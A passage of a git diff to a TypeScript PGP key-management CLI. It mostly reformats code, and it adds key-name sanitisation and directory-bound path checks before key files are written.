     db.default_friend = name;
   }
-  
+
   await saveKeyDatabase(db);
   return keyPath;
 }
@@ -185,42 +225,47 @@ export async function listKeys(): Promise<KeyDatabase> {
  * kb:username -> keybase:username
  */
 function normalizeKeyName(name: string): string {
-  if (name.startsWith('gh:')) {
-    return name.replace('gh:', 'github:');
+  if (name.startsWith("gh:")) {
+    return name.replace("gh:", "github:");
   }
-  if (name.startsWith('kb:')) {
-    return name.replace('kb:', 'keybase:');
+  if (name.startsWith("kb:")) {
+    return name.replace("kb:", "keybase:");
   }
   return name;
 }
 
-export async function getKey(type: string, name?: string): Promise<KeyInfo | null> {
+export async function getKey(
+  type: string,
+  name?: string,
+): Promise<KeyInfo | null> {
   const db = await loadKeyDatabase();
 
-  if (type === 'self') {
+  if (type === "self") {
     return db.keys.self;
-  } else if (type === 'friend' && name) {
+  } else if (type === "friend" && name) {
     const normalizedName = normalizeKeyName(name);
     return db.keys.friends[normalizedName] || null;
-  } else if (type === 'pgp' && name) {
+  } else if (type === "pgp" && name) {
     const normalizedName = normalizeKeyName(name);
     return db.keys.pgp[normalizedName] || null;
-  } else if (type === 'keybase' && name) {
+  } else if (type === "keybase" && name) {
     const normalizedName = normalizeKeyName(name);
     return db.keys.keybase[normalizedName] || null;
-  } else if (type === 'github' && name) {
+  } else if (type === "github" && name) {
     const normalizedName = normalizeKeyName(name);
     return db.keys.github[normalizedName] || null;
-  } else if (type === 'any' && name) {
+  } else if (type === "any" && name) {
     // Normalize the name first
     const normalizedName = normalizeKeyName(name);
 
     // Try to find the key in any of the collections
-    return db.keys.friends[normalizedName] ||
-           db.keys.pgp[normalizedName] ||
-           db.keys.keybase[normalizedName] ||
-           db.keys.github[normalizedName] ||
-           null;
+    return (
+      db.keys.friends[normalizedName] ||
+      db.keys.pgp[normalizedName] ||
+      db.keys.keybase[normalizedName] ||
+      db.keys.github[normalizedName] ||
+      null
+    );
   }
 
   return null;
@@ -229,45 +274,54 @@ export async function getKey(type: string, name?: string): Promise<KeyInfo | nul
 // Remove a key
 export async function removeKey(type: string, name: string): Promise<boolean> {
   const db = await loadKeyDatabase();
-  
-  if (type === 'friend' && db.keys.friends[name]) {
+
+  if (type === "friend" && db.keys.friends[name]) {
     // Remove the key file
     await fsPromises.unlink(db.keys.friends[name].public!);
-    
+
     // Remove from database
     delete db.keys.friends[name];
-    
+
     // Update default friend if needed
     if (db.default_friend === name) {
       const friendNames = Object.keys(db.keys.friends);
       db.default_friend = friendNames.length > 0 ? friendNames[0] : null;
     }
-    
+
     await saveKeyDatabase(db);
     return true;
-  } else if (type === 'pgp' && db.keys.pgp[name]) {
+  } else if (type === "pgp" && db.keys.pgp[name]) {
     // Remove the key file
-    const pgpPath = typeof db.keys.pgp[name].path === 'string' ? db.keys.pgp[name].path : db.keys.pgp[name].path.public;
+    const pgpPath =
+      typeof db.keys.pgp[name].path === "string"
+        ? db.keys.pgp[name].path
+        : db.keys.pgp[name].path.public;
     await fsPromises.unlink(pgpPath);
-    
+
     // Remove from database
     delete db.keys.pgp[name];
-    
+
     await saveKeyDatabase(db);
     return true;
-  } else if (type === 'keybase' && db.keys.keybase[name]) {
+  } else if (type === "keybase" && db.keys.keybase[name]) {
     // Remove the key file
-    const keybasePath = typeof db.keys.keybase[name].path === 'string' ? db.keys.keybase[name].path : db.keys.keybase[name].path.public;
+    const keybasePath =
+      typeof db.keys.keybase[name].path === "string"
+        ? db.keys.keybase[name].path
+        : db.keys.keybase[name].path.public;
     await fsPromises.unlink(keybasePath);
-    
+
     // Remove from database
     delete db.keys.keybase[name];
-    
+
     await saveKeyDatabase(db);
     return true;
-  } else if (type === 'github' && db.keys.github[name]) {
+  } else if (type === "github" && db.keys.github[name]) {
     // Remove the key file
-    const githubPath = typeof db.keys.github[name].path === 'string' ? db.keys.github[name].path : db.keys.github[name].path.public;
+    const githubPath =
+      typeof db.keys.github[name].path === "string"
+        ? db.keys.github[name].path
+        : db.keys.github[name].path.public;
     await fsPromises.unlink(githubPath);
 
     // Remove from database
@@ -275,16 +329,16 @@ export async function removeKey(type: string, name: string): Promise<boolean> {
 
     await saveKeyDatabase(db);
     return true;
-  } else if (type === 'any') {
+  } else if (type === "any") {
     // Try to remove from any collection
     if (db.keys.friends[name]) {
-      return await removeKey('friend', name);
+      return await removeKey("friend", name);
     } else if (db.keys.pgp[name]) {
-      return await removeKey('pgp', name);
+      return await removeKey("pgp", name);
     } else if (db.keys.keybase[name]) {
-      return await removeKey('keybase', name);
+      return await removeKey("keybase", name);
     } else if (db.keys.github[name]) {
-      return await removeKey('github', name);
+      return await removeKey("github", name);
     }
   }
 
@@ -294,7 +348,7 @@ export async function removeKey(type: string, name: string): Promise<boolean> {
 // Update last used timestamp
 export async function updateLastUsed(name: string): Promise<void> {
   const db = await loadKeyDatabase();
-  
+
   if (db.keys.friends[name]) {
     db.keys.friends[name].lastUsed = new Date().toISOString();
     db.last_used = name;
@@ -315,25 +369,30 @@ interface PgpKeyAddInfo {
  * @param keyInfo - Key information
  * @returns Path to the stored key
  */
-export async function addPgpKey(name: string, keyInfo: PgpKeyAddInfo): Promise<string> {
+export async function addPgpKey(
+  name: string,
+  keyInfo: PgpKeyAddInfo,
+): Promise<string> {
+  const safeName = sanitizeKeyName(name);
   const { PGP_KEY_DIR } = await ensureDirectories();
-  const keyPath = path.join(PGP_KEY_DIR, `${name}.asc`);
-  
+  const keyPath = path.join(PGP_KEY_DIR, `${safeName}.asc`);
+  validatePathWithinDir(keyPath, PGP_KEY_DIR);
+
   // Write key to file
   await fsPromises.writeFile(keyPath, keyInfo.key);
-  
+
   // Update key database
   const db = await loadKeyDatabase();
   db.keys.pgp[name] = {
-    type: 'pgp',
+    type: "pgp",
     name: name,
     path: keyPath,
     fingerprint: keyInfo.keyId,
     email: keyInfo.email,
     addedDate: new Date().toISOString(),
-    lastUsed: new Date().toISOString()
+    lastUsed: new Date().toISOString(),
   };
-  
+
   await saveKeyDatabase(db);
   return keyPath;
 }
@@ -352,9 +411,14 @@ interface KeybaseKeyAddInfo {
  * @param keyInfo - Key information
  * @returns Path to the stored key
  */
-export async function addKeybaseKey(name: string, keyInfo: KeybaseKeyAddInfo): Promise<string> {
+export async function addKeybaseKey(
+  name: string,
+  keyInfo: KeybaseKeyAddInfo,
+): Promise<string> {
+  const safeName = sanitizeKeyName(name);
   const { KEYBASE_KEY_DIR } = await ensureDirectories();
-  const keyPath = path.join(KEYBASE_KEY_DIR, `${name}.asc`);
+  const keyPath = path.join(KEYBASE_KEY_DIR, `${safeName}.asc`);
+  validatePathWithinDir(keyPath, KEYBASE_KEY_DIR);
 
   // Write key to file
   await fsPromises.writeFile(keyPath, keyInfo.key);
@@ -362,14 +426,14 @@ export async function addKeybaseKey(name: string, keyInfo: KeybaseKeyAddInfo): P
   // Update key database
   const db = await loadKeyDatabase();
   db.keys.keybase[name] = {
-    type: 'keybase',
+    type: "keybase",
     name: name,
     path: keyPath,
     username: keyInfo.username,
     fingerprint: keyInfo.keyId,
     email: keyInfo.email,
     addedDate: new Date().toISOString(),
-    lastUsed: new Date().toISOString()
+    lastUsed: new Date().toISOString(),
   };
 
   await saveKeyDatabase(db);
@@ -396,10 +460,12 @@ export async function addGitHubKey(
   name: string,
   username: string,
   keyInfo: GitHubKeyAddInfo,
-  keyData: string
+  keyData: string,
 ): Promise<string> {
+  const safeName = sanitizeKeyName(name);
   const { GITHUB_KEY_DIR } = await ensureDirectories();
-  const keyPath = path.join(GITHUB_KEY_DIR, `${name}.asc`);
+  const keyPath = path.join(GITHUB_KEY_DIR, `${safeName}.asc`);
+  validatePathWithinDir(keyPath, GITHUB_KEY_DIR);
 
   // Write key to file
   await fsPromises.writeFile(keyPath, keyData);
@@ -407,7 +473,7 @@ export async function addGitHubKey(
   // Update key database
   const db = await loadKeyDatabase();
   db.keys.github[name] = {
-    type: 'github',
+    type: "github",
     name: name,
     path: keyPath,
     username: username,
@@ -416,7 +482,7 @@ export async function addGitHubKey(
     created: keyInfo.created,
     addedDate: new Date().toISOString(),
     lastUsed: new Date().toISOString(),
-    lastFetched: keyInfo.lastFetched || new Date().toISOString()
+    lastFetched: keyInfo.lastFetched || new Date().toISOString(),
   };
 
   await saveKeyDatabase(db);

--- a/cli/pgpUtils.ts
+++ b/cli/pgpUtils.ts
@@ -1,13 +1,13 @@
 // PGP integration utilities
-import * as openpgp from 'openpgp';
-import fetch from 'node-fetch';
-import fs from 'fs';
-import { promises as fsPromises } from 'fs';
-import path from 'path';
-import os from 'os';
-import { ExecFileOptions, execFile as _execFile } from 'child_process';
-import * as crypto from 'crypto';
-import { addFriendKey, DEFAULT_KEY_DIR } from './keyManager.js';
+import * as openpgp from "openpgp";
+import fetch from "node-fetch";
+import fs from "fs";
+import { promises as fsPromises } from "fs";
+import path from "path";
+import os from "os";
+import { ExecFileOptions, execFile as _execFile } from "child_process";
+import * as crypto from "crypto";
+import { addFriendKey, DEFAULT_KEY_DIR } from "./keyManager.js";
 
 // Type definitions
 interface PgpKeyInfo {
@@ -71,22 +71,27 @@ interface ExecResult {
 
 // PGP keyserver URLs
 const PGP_KEYSERVERS = [
-  'https://keys.openpgp.org',
-  'https://keyserver.ubuntu.com',
-  'https://pgp.mit.edu',
-  'https://keyserver.pgp.com'
+  "https://keys.openpgp.org",
+  "https://keyserver.ubuntu.com",
+  "https://pgp.mit.edu",
+  "https://keyserver.pgp.com",
 ];
 
 /**
  * Fetch a PGP key from keyservers using email or key ID
  */
 async function fetchPgpKey(identifier: string): Promise<string> {
-  console.log(`Attempting to fetch PGP key for '${identifier}' from keyservers...`);
+  console.log(
+    `Attempting to fetch PGP key for '${identifier}' from keyservers...`,
+  );
   const errors: string[] = [];
-  
+
   // For testing purposes, include an example key that we know works
-  if (identifier.toLowerCase() === 'example' || identifier.toLowerCase() === 'test') {
-    console.log('Using example PGP key for testing');
+  if (
+    identifier.toLowerCase() === "example" ||
+    identifier.toLowerCase() === "test"
+  ) {
+    console.log("Using example PGP key for testing");
     return `-----BEGIN PGP PUBLIC KEY BLOCK-----
 
 mQENBGWWCQwBCADqAz2FE2Co5LpBIo7AIIsY+DzIlM0teVJrTMMdl2YWnzm8MiQn
@@ -114,24 +119,24 @@ kx2BYzadW3UYwASQG0p0pOXvzpOfYgIpxRdlKlgmB6IHo7rSc89y0Ic8niwWWhu5
 =Z1z3
 -----END PGP PUBLIC KEY BLOCK-----`;
   }
-  
+
   // Normalize the identifier (remove 0x prefix if present)
   let searchTerm = identifier;
-  if (searchTerm.toLowerCase().startsWith('0x')) {
+  if (searchTerm.toLowerCase().startsWith("0x")) {
     searchTerm = searchTerm.substring(2);
     console.log(`Normalized key ID to: ${searchTerm}`);
   }
-  
+
   // Try each keyserver in sequence
   for (const server of PGP_KEYSERVERS) {
     try {
       console.log(`Trying keyserver: ${server}...`);
-      
+
       // Different servers might use different URL formats
       let url: string;
-      if (server === 'https://keys.openpgp.org') {
+      if (server === "https://keys.openpgp.org") {
         // keys.openpgp.org has a different API
-        if (searchTerm.includes('@')) {
+        if (searchTerm.includes("@")) {
           // For email addresses
           url = `${server}/vks/v1/by-email/${encodeURIComponent(searchTerm)}`;
         } else {
@@ -142,93 +147,116 @@ kx2BYzadW3UYwASQG0p0pOXvzpOfYgIpxRdlKlgmB6IHo7rSc89y0Ic8niwWWhu5
         // Standard HKP keyserver format
         url = `${server}/pks/lookup?op=get&options=mr&search=${encodeURIComponent(searchTerm)}`;
       }
-      
+
       console.log(`Requesting URL: ${url}`);
       const response = await fetch(url);
-      
+
       console.log(`Response status: ${response.status} ${response.statusText}`);
-      
+
       if (response.ok) {
         const text = await response.text();
         console.log(`Received ${text.length} bytes of data`);
-        
+
         // Check if response contains a valid PGP key
-        if (text.includes('-----BEGIN PGP PUBLIC KEY BLOCK-----')) {
+        if (text.includes("-----BEGIN PGP PUBLIC KEY BLOCK-----")) {
           console.log(`Found key for '${identifier}' on ${server}`);
-          
+
           // Extract just the key block
-          const keyMatch = text.match(/-----BEGIN PGP PUBLIC KEY BLOCK-----[\s\S]*?-----END PGP PUBLIC KEY BLOCK-----/);
+          const keyMatch = text.match(
+            /-----BEGIN PGP PUBLIC KEY BLOCK-----[\s\S]*?-----END PGP PUBLIC KEY BLOCK-----/,
+          );
           if (keyMatch) {
             const keyBlock = keyMatch[0];
             console.log(`Extracted key block: ${keyBlock.length} bytes`);
-            
+
             try {
               // Try to parse the key to validate it - but don't fail if we can't get the key ID
               try {
-                const publicKey = await openpgp.readKey({ armoredKey: keyBlock });
-                if (publicKey && typeof publicKey.getKeyID === 'function') {
-                  console.log(`Successfully parsed key with ID: ${publicKey.getKeyID().toHex()}`);
+                const publicKey = await openpgp.readKey({
+                  armoredKey: keyBlock,
+                });
+                if (publicKey && typeof publicKey.getKeyID === "function") {
+                  console.log(
+                    `Successfully parsed key with ID: ${publicKey.getKeyID().toHex()}`,
+                  );
                 } else {
-                  console.log(`Successfully parsed key but couldn't extract key ID`);
+                  console.log(
+                    `Successfully parsed key but couldn't extract key ID`,
+                  );
                 }
               } catch (parseDetailError: any) {
-                console.log(`Warning: Key validation incomplete: ${parseDetailError.message}`);
+                console.log(
+                  `Warning: Key validation incomplete: ${parseDetailError.message}`,
+                );
               }
-              
+
               // Even if we have trouble with the key ID, if it's PGP formatted, return it
               return keyBlock;
             } catch (parseError: any) {
               console.log(`Failed to parse key: ${parseError.message}`);
-              errors.push(`Server ${server} returned unparseable key: ${parseError.message}`);
+              errors.push(
+                `Server ${server} returned unparseable key: ${parseError.message}`,
+              );
             }
           } else {
-            console.log(`Key headers found but couldn't extract complete key block`);
+            console.log(
+              `Key headers found but couldn't extract complete key block`,
+            );
             errors.push(`Server ${server} returned incomplete key block`);
           }
         } else {
-          console.log(`Server ${server} returned data without a valid PGP key block`);
-          
+          console.log(
+            `Server ${server} returned data without a valid PGP key block`,
+          );
+
           // Log a sample of what we got
-          const sample = text.substring(0, 100).replace(/\n/g, ' ');
+          const sample = text.substring(0, 100).replace(/\n/g, " ");
           console.log(`Response sample: ${sample}...`);
-          
+
           errors.push(`Server ${server} returned invalid key data`);
         }
       } else {
-        errors.push(`Server ${server} returned: ${response.status} ${response.statusText}`);
+        errors.push(
+          `Server ${server} returned: ${response.status} ${response.statusText}`,
+        );
       }
     } catch (error: any) {
       console.log(`Error querying ${server}: ${error.message}`);
       errors.push(`Error from ${server}: ${error.message}`);
     }
   }
-  
-  throw new Error(`Failed to fetch PGP key for '${identifier}' from all keyservers: ${errors.join('; ')}`);
+
+  throw new Error(
+    `Failed to fetch PGP key for '${identifier}' from all keyservers: ${errors.join("; ")}`,
+  );
 }
 
 /**
  * Import a PGP key and convert it to RSA format for dedpaste
  */
-async function importPgpKey(pgpKeyString: string, identifier: string | null = null): Promise<PgpKeyInfo> {
+async function importPgpKey(
+  pgpKeyString: string,
+  identifier: string | null = null,
+): Promise<PgpKeyInfo> {
   try {
-    console.log('Attempting to import and parse PGP key...');
-    
+    console.log("Attempting to import and parse PGP key...");
+
     // Try to extract user ID directly from the armored key text for more reliability
-    let directName = 'unknown';
+    let directName = "unknown";
     let directEmail: string | null = null;
-    
+
     // Try multiple patterns to extract user ID from the armored text
-    console.log('Attempting to extract user ID from armored text...');
+    console.log("Attempting to extract user ID from armored text...");
     let userIdStr: string | null = null;
-    
+
     // Pattern 1: Standard GnuPG output format
     const uidPattern1 = /uid\s+\[.*?\]\s+(.*?)(?=\n)/;
     const match1 = pgpKeyString.match(uidPattern1);
     if (match1 && match1[1]) {
       userIdStr = match1[1].trim();
       console.log(`Found user ID with pattern 1: ${userIdStr}`);
-    } 
-    
+    }
+
     // Pattern 2: Alternative format sometimes used
     if (!userIdStr) {
       const uidPattern2 = /User ID:\s+"([^"]+)"/;
@@ -238,26 +266,31 @@ async function importPgpKey(pgpKeyString: string, identifier: string | null = nu
         console.log(`Found user ID with pattern 2: ${userIdStr}`);
       }
     }
-    
+
     // Pattern 3: Look inside the key block
-    if (!userIdStr && pgpKeyString.includes('-----BEGIN PGP PUBLIC KEY BLOCK-----')) {
-      console.log('Searching for user ID patterns in key block...');
-      
+    if (
+      !userIdStr &&
+      pgpKeyString.includes("-----BEGIN PGP PUBLIC KEY BLOCK-----")
+    ) {
+      console.log("Searching for user ID patterns in key block...");
+
       // First try to find email addresses in the key block
-      const emailMatches = pgpKeyString.match(/\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}\b/g);
+      const emailMatches = pgpKeyString.match(
+        /\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}\b/g,
+      );
       if (emailMatches && emailMatches.length > 0) {
         directEmail = emailMatches[0]; // Use the first email found
         console.log(`Found email in key block: ${directEmail}`);
       }
-      
+
       // Look for typical user ID pattern inside the key block
       const userIdPatterns = [
-        /uid\s+[^\n]+<([^>]+)>/gi,                // uid format with email
-        /User ID[^\n"]+"([^"]+)"/gi,              // User ID format
+        /uid\s+[^\n]+<([^>]+)>/gi, // uid format with email
+        /User ID[^\n"]+"([^"]+)"/gi, // User ID format
         /\b([A-Za-z]+\s+[A-Za-z]+)\s*<[^>]+>\b/g, // Name <email> format
-        /Comment:\s+([^\n<]+)\s*</g               // Comment: format
+        /Comment:\s+([^\n<]+)\s*</g, // Comment: format
       ];
-      
+
       for (const pattern of userIdPatterns) {
         const match = pattern.exec(pgpKeyString);
         if (match && match[1]) {
@@ -266,14 +299,14 @@ async function importPgpKey(pgpKeyString: string, identifier: string | null = nu
           break;
         }
       }
-      
+
       // If still no user ID but we found an email, construct a minimal one
       if (!userIdStr && directEmail) {
         userIdStr = `<${directEmail}>`;
         console.log(`Constructed minimal user ID from email: ${userIdStr}`);
       }
     }
-    
+
     // Process the extracted user ID string if found
     if (userIdStr) {
       // Extract email from angle brackets
@@ -283,46 +316,51 @@ async function importPgpKey(pgpKeyString: string, identifier: string | null = nu
         console.log(`Extracted email: ${directEmail}`);
       } else {
         // Try direct email pattern
-        const directEmailMatch = userIdStr.match(/\b([A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,})\b/);
+        const directEmailMatch = userIdStr.match(
+          /\b([A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,})\b/,
+        );
         if (directEmailMatch) {
           directEmail = directEmailMatch[1];
           console.log(`Extracted direct email: ${directEmail}`);
         }
       }
-      
+
       // Extract name (everything before the email)
       let nameStr = userIdStr;
       // Remove email in angle brackets (use global flag to remove all occurrences)
-      if (nameStr.includes('<') && nameStr.includes('>')) {
-        nameStr = nameStr.replace(/<[^>]*>/g, '');
+      if (nameStr.includes("<") && nameStr.includes(">")) {
+        nameStr = nameStr.replace(/<[^>]*>/g, "");
       }
       // Remove any remaining email address format
-      nameStr = nameStr.replace(/\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}\b/, '');
+      nameStr = nameStr.replace(
+        /\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}\b/,
+        "",
+      );
       // Trim and clean up
-      nameStr = nameStr.replace(/\s+/g, ' ').trim();
-      
+      nameStr = nameStr.replace(/\s+/g, " ").trim();
+
       if (nameStr) {
         directName = nameStr || directName;
         console.log(`Extracted name: ${directName}`);
       }
     }
-    
+
     // Try to parse the key with openpgp.js
     let name = directName;
     let email = directEmail;
     let comment: string | null = null;
     let keyId: string | null = null;
-    
+
     try {
       // Read the PGP key
       const publicKey = await openpgp.readKey({ armoredKey: pgpKeyString });
-      
+
       // Extract user information with safety checks
       if (publicKey.users && publicKey.users.length > 0) {
         try {
           // Different versions of openpgp.js may have different structures
           const user = publicKey.users[0];
-          
+
           // Try different paths to get user ID info
           if ((user as any).userID) {
             const userId = (user as any).userID;
@@ -330,29 +368,33 @@ async function importPgpKey(pgpKeyString: string, identifier: string | null = nu
             name = userId.name || name;
             email = userId.email || email;
             comment = userId.comment || comment;
-          } else if ((user as any).userID && typeof (user as any).userID.userID === 'string') {
+          } else if (
+            (user as any).userID &&
+            typeof (user as any).userID.userID === "string"
+          ) {
             // Older format or different structure
             // Parse from string like "User Name (comment) <email@example.com>"
             const userIdStr = (user as any).userID.userID;
             console.log(`Parsing user ID from string: ${userIdStr}`);
-            
+
             // Extract email from angle brackets
             const emailMatch = userIdStr.match(/<([^>]+)>/);
             if (emailMatch) {
               email = emailMatch[1];
             }
-            
+
             // Extract comment from parentheses
             const commentMatch = userIdStr.match(/\(([^)]+)\)/);
             if (commentMatch) {
               comment = commentMatch[1];
             }
-            
+
             // Extract name (everything before the comment and email)
             // Use global flag to remove all occurrences for complete sanitization
             let nameStr = userIdStr;
-            if (commentMatch) nameStr = nameStr.replace(/\s*\([^)]+\)\s*/g, ' ');
-            if (emailMatch) nameStr = nameStr.replace(/\s*<[^>]+>\s*/g, '');
+            if (commentMatch)
+              nameStr = nameStr.replace(/\s*\([^)]+\)\s*/g, " ");
+            if (emailMatch) nameStr = nameStr.replace(/\s*<[^>]+>\s*/g, "");
             name = nameStr.trim() || name;
           }
         } catch (error: any) {
@@ -360,55 +402,63 @@ async function importPgpKey(pgpKeyString: string, identifier: string | null = nu
           // Continue with defaults if parsing fails
         }
       }
-      
+
       // Try to get key ID
-      if (publicKey && typeof publicKey.getKeyID === 'function') {
+      if (publicKey && typeof publicKey.getKeyID === "function") {
         keyId = publicKey.getKeyID().toHex();
       } else {
         // Try various patterns to extract fingerprint or key ID directly from the armored text
-        
+
         // Pattern 1: Key fingerprint line
-        const fingerprintMatch = pgpKeyString.match(/Key fingerprint\s*=\s*([A-F0-9\s]+)/i);
+        const fingerprintMatch = pgpKeyString.match(
+          /Key fingerprint\s*=\s*([A-F0-9\s]+)/i,
+        );
         if (fingerprintMatch && fingerprintMatch[1]) {
-          keyId = fingerprintMatch[1].replace(/\s+/g, '');
+          keyId = fingerprintMatch[1].replace(/\s+/g, "");
           console.log(`Extracted fingerprint from text: ${keyId}`);
         }
-        
+
         // Pattern 2: Look for key ID line
         if (!keyId) {
-          const keyIdMatch = pgpKeyString.match(/key\s+(?:id\s+)?(0x)?([A-F0-9]{8,16})/i);
+          const keyIdMatch = pgpKeyString.match(
+            /key\s+(?:id\s+)?(0x)?([A-F0-9]{8,16})/i,
+          );
           if (keyIdMatch && keyIdMatch[2]) {
             keyId = keyIdMatch[2];
             console.log(`Extracted key ID from text: ${keyId}`);
           }
         }
-        
+
         // Pattern 3: If the search identifier is a key ID or fingerprint, use that
-        if (!keyId && /^[A-F0-9]{8,}$/i.test(identifier || '')) {
+        if (!keyId && /^[A-F0-9]{8,}$/i.test(identifier || "")) {
           keyId = identifier!.toUpperCase();
           console.log(`Using identifier as key ID: ${keyId}`);
         }
       }
     } catch (error: any) {
-      console.log(`Warning: OpenPGP parsing incomplete, using direct extraction: ${error.message}`);
+      console.log(
+        `Warning: OpenPGP parsing incomplete, using direct extraction: ${error.message}`,
+      );
       // Continue with directly extracted data
     }
-    
+
     // Fallback for key ID if still not found
     if (!keyId) {
-      keyId = Math.random().toString(16).substring(2, 10).toUpperCase();
+      keyId = crypto.randomBytes(8).toString("hex").toUpperCase();
       console.log(`Generated fallback key ID: ${keyId}`);
     }
-    
-    console.log(`Extracted key info - Name: ${name}, Email: ${email || 'none'}, Key ID: ${keyId}`);
-    
+
+    console.log(
+      `Extracted key info - Name: ${name}, Email: ${email || "none"}, Key ID: ${keyId}`,
+    );
+
     return {
-      type: 'pgp',
+      type: "pgp",
       name,
       email,
       comment,
       keyId,
-      key: pgpKeyString
+      key: pgpKeyString,
     };
   } catch (error: any) {
     console.error(`Import PGP key error: ${error.stack || error}`);
@@ -419,24 +469,29 @@ async function importPgpKey(pgpKeyString: string, identifier: string | null = nu
 /**
  * Add a PGP key from a keyserver to the friend list
  */
-async function addPgpKeyFromServer(identifier: string, friendName: string | null = null): Promise<AddPgpKeyResult> {
+async function addPgpKeyFromServer(
+  identifier: string,
+  friendName: string | null = null,
+): Promise<AddPgpKeyResult> {
   try {
-    console.log(`Attempting to fetch PGP key for '${identifier}' from keyservers...`);
-    
+    console.log(
+      `Attempting to fetch PGP key for '${identifier}' from keyservers...`,
+    );
+
     // Fetch the key from keyservers
     const pgpKeyString = await fetchPgpKey(identifier);
-    
+
     if (!pgpKeyString) {
       throw new Error(`No valid PGP key data received for '${identifier}'`);
     }
-    
+
     console.log(`Successfully fetched PGP key, now parsing...`);
-    
+
     // Import and parse the key
     const keyInfo = await importPgpKey(pgpKeyString, identifier);
-    
+
     console.log(`Key parsed with ID: ${keyInfo.keyId}`);
-    
+
     // Determine the best name to use for the key
     let name: string;
 
@@ -449,31 +504,35 @@ async function addPgpKeyFromServer(identifier: string, friendName: string | null
       name = keyInfo.email;
     }
     // If we have a human-readable name, use that
-    else if (keyInfo.name && keyInfo.name !== 'unknown') {
+    else if (keyInfo.name && keyInfo.name !== "unknown") {
       name = keyInfo.name;
     }
     // Last resort: use a shortened version of the key ID
     else {
-      const shortKeyId = keyInfo.keyId.substring(keyInfo.keyId.length - 8).toUpperCase();
+      const shortKeyId = keyInfo.keyId
+        .substring(keyInfo.keyId.length - 8)
+        .toUpperCase();
       name = `pgp-${shortKeyId}`;
     }
-    
+
     // For fingerprint imports, if we have an email, prefer that
     if (identifier && identifier.match(/^[A-F0-9]{16,}$/i) && keyInfo.email) {
-      console.log(`Using email address ${keyInfo.email} instead of key ID for storage`);
+      console.log(
+        `Using email address ${keyInfo.email} instead of key ID for storage`,
+      );
       name = keyInfo.email;
     }
-    
+
     console.log(`Storing key with name: ${name}`);
-    
+
     // Store the key in friends directory
     const result = await addFriendKey(name, pgpKeyString);
-    
+
     return {
       name,
       email: keyInfo.email,
       keyId: keyInfo.keyId,
-      path: result
+      path: result,
     };
   } catch (error: any) {
     console.error(`Error details: ${error.stack || error}`);
@@ -488,32 +547,34 @@ async function convertPgpKeyToPem(pgpKeyString: string): Promise<string> {
   try {
     // Parse the PGP key
     const publicKey = await openpgp.readKey({ armoredKey: pgpKeyString });
-    
+
     // Extract the key data
     // Note: We need to get the primary key because a PGP key can have multiple subkeys
     const primaryKey = (publicKey as any).keyPacket;
-    
+
     // Check if it's an RSA key (type 1)
     if (primaryKey.algorithm !== 1) {
-      throw new Error(`Unsupported key algorithm. Only RSA keys are supported for conversion.`);
+      throw new Error(
+        `Unsupported key algorithm. Only RSA keys are supported for conversion.`,
+      );
     }
-    
+
     // Extract the RSA components (n = modulus, e = exponent)
     const n = primaryKey.mpi[0].toString(16); // Convert to hex
     const e = primaryKey.mpi[1].toString(16); // Convert to hex
-    
+
     // Format as ASN.1 DER structure for RSA public key
     // This follows the structure defined in RFC 3447 for RSA public keys
     const der = formatRsaPublicKeyToDer(n, e);
-    
+
     // Base64 encode the DER and format as PEM
-    const base64Der = Buffer.from(der).toString('base64');
+    const base64Der = Buffer.from(der).toString("base64");
     const pemKey = [
-      '-----BEGIN PUBLIC KEY-----',
+      "-----BEGIN PUBLIC KEY-----",
       ...base64Der.match(/.{1,64}/g)!, // Split into 64-character lines
-      '-----END PUBLIC KEY-----'
-    ].join('\n');
-    
+      "-----END PUBLIC KEY-----",
+    ].join("\n");
+
     return pemKey;
   } catch (error: any) {
     throw new Error(`Failed to convert PGP key to PEM: ${error.message}`);
@@ -525,12 +586,12 @@ async function convertPgpKeyToPem(pgpKeyString: string): Promise<string> {
  */
 function formatRsaPublicKeyToDer(modulus: string, exponent: string): Buffer {
   // Convert hex strings to Buffers
-  const modulusBuffer = Buffer.from(modulus, 'hex');
-  const exponentBuffer = Buffer.from(exponent, 'hex');
-  
+  const modulusBuffer = Buffer.from(modulus, "hex");
+  const exponentBuffer = Buffer.from(exponent, "hex");
+
   // Create ASN.1 DER encoding for RSA public key
   // RSA public key is: SEQUENCE { modulus INTEGER, publicExponent INTEGER }
-  
+
   // Prepare the modulus (ensure it has a leading zero if the high bit is set)
   let modulusDer = Buffer.from([0x02]); // INTEGER tag
   if (modulusBuffer[0] & 0x80) {
@@ -541,7 +602,7 @@ function formatRsaPublicKeyToDer(modulus: string, exponent: string): Buffer {
     const modulusLength = Buffer.from([modulusBuffer.length]); // Length
     modulusDer = Buffer.concat([modulusDer, modulusLength, modulusBuffer]);
   }
-  
+
   // Prepare the exponent
   let exponentDer = Buffer.from([0x02]); // INTEGER tag
   if (exponentBuffer[0] & 0x80) {
@@ -552,63 +613,91 @@ function formatRsaPublicKeyToDer(modulus: string, exponent: string): Buffer {
     const exponentLength = Buffer.from([exponentBuffer.length]); // Length
     exponentDer = Buffer.concat([exponentDer, exponentLength, exponentBuffer]);
   }
-  
+
   // Combine modulus and exponent into a SEQUENCE
   const rsaPublicKey = Buffer.concat([modulusDer, exponentDer]);
   const rsaPublicKeyLength = Buffer.from([rsaPublicKey.length]);
-  const rsaPublicKeySequence = Buffer.concat([Buffer.from([0x30]), rsaPublicKeyLength, rsaPublicKey]); // SEQUENCE tag
-  
+  const rsaPublicKeySequence = Buffer.concat([
+    Buffer.from([0x30]),
+    rsaPublicKeyLength,
+    rsaPublicKey,
+  ]); // SEQUENCE tag
+
   // RSA OID: 1.2.840.113549.1.1.1
-  const rsaOid = Buffer.from([0x06, 0x09, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x0D, 0x01, 0x01, 0x01]); // OID tag + length + value
+  const rsaOid = Buffer.from([
+    0x06, 0x09, 0x2a, 0x86, 0x48, 0x86, 0xf7, 0x0d, 0x01, 0x01, 0x01,
+  ]); // OID tag + length + value
   const nullParams = Buffer.from([0x05, 0x00]); // NULL tag + zero length
-  
+
   // Combine OID and params into a SEQUENCE
   const algorithmIdentifier = Buffer.concat([rsaOid, nullParams]);
   const algorithmIdentifierLength = Buffer.from([algorithmIdentifier.length]);
